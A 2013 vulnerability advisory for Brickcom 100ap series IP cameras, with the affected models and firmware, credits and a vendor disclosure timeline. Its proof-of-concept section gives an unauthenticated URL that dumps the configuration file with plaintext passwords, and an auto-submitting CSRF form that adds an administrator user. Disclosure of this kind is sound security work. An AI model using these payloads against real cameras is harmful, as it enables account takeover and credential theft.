Brickcom 100ap Series Authentication Bypass / CSRF

`============================================================================  
BRICKCOM  
====================================================================  
============================================================================  
  
1.Advisory Information  
Title: Brickcom 100ap Series Vulnerabilities  
Date Published: 12/06/2013  
Date of last updated: 12/06/2013  
  
2.Vulnerability Description  
Multiples vulnerabilities have been found in this device.  
-CVE-2013-3689. Authentication Bypass Issues(CWE-592) and Clear Text Storage of Sensitive Information(CWE-312)  
-CVE-2013-3690. Cross Site Request Forgery(CWE-352), Permissions, Privileges, and Access Control(CWE-264) and Execution with Unnecessary Privileges(CWE-250)  
  
3.Affected Products  
The following products are affected by these vulnerabilities:  
FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E  
It’s possible others models are affected but they were not checked.  
-CVE-2013-3689.  
We have detected the following vulnerable firmwares: firmwareVersion=v3.0.6.7, v3.0.6.12, v3.0.6.16C1  
In the next firmwares, you need to be log-in as administrator to download this file, but the information is in plain text yet: firmwareVersion=v3.1.0.8,v3.1.0.4  
-CVE-2013-3690.  
All firmware checked.  
  
4.PoC  
4.1.Authentication Bypass & Clear Text Storage of Sensitive Information  
CVE-2013-3689, These allows you to download the all the configuration device file writing the next URL (all data shown will be in plain text). It’s not necessary any authentication.  
_____________________________________________________________________________  
http://xx.xx.xx.xx/configfile.dump?action=get  
_____________________________________________________________________________  
  
The most interesting parameters could be:  
UserSetSetting.userList.users[nº].password= ***  
UserSetSetting.userList.users[nº].name= ***  
  
4.2.Cross Site Request Forgerty (CSRF) + Privilege Escalation  
CVE-2013-3690, CSRF is possible via POST method.   
Also is possible a privilege escalation from a viewer user to an administrator user.  
These cameras use a web interface which is prone to CSRF vulnerabilities.   
A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters.  
The following request can exploit this vulnerability  
_____________________________________________________________________________  
<html>  
<body>  
<form name="gobap" action="http://xx.xx.xx.xx/cgi-bin/users.cgi" method="POST">  
<input type="hidden" name="action" value="add">  
<input type="hidden" name="index" value="0">  
<input type="hidden" name="username" value="test2">  
<input type="hidden" name="password" value="test2">  
<input type="hidden" name="privilege" value="1">  
<script>document.gobap.submit();</script>  
</form>  
</body>  
</html>  
_____________________________________________________________________________  
  
5.Credits  
-CVE-2013-3689 was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez and Jonás Ropero Castillo.   
-CVE-2013-3690 was discovered by Jonás Ropero Castillo.   
  
6.Report Timeline  
-2013-05-31: Students team notifies the Brickcom Customer Support of the vulnerabilities.   
-2013-05-31: Brickcom answers saying this in accordance with some of the vulnerabilities, but there are some that they think is not correct.  
(CVE-2013-3689, Authentication bypass and plain text information: After talk with vendor, it’s looks that after firmware 3.1.x.x, this bug is fixed but still the information is shown in plain text, so they should fix this second one)  
-2013-06-03: Students check and communicate Brickcom the detail products and firmwares affected by vulnerabilities.  
-2013-06-04: The vendor is agree with everything stated and reports that will fix it as soon as possible.  
`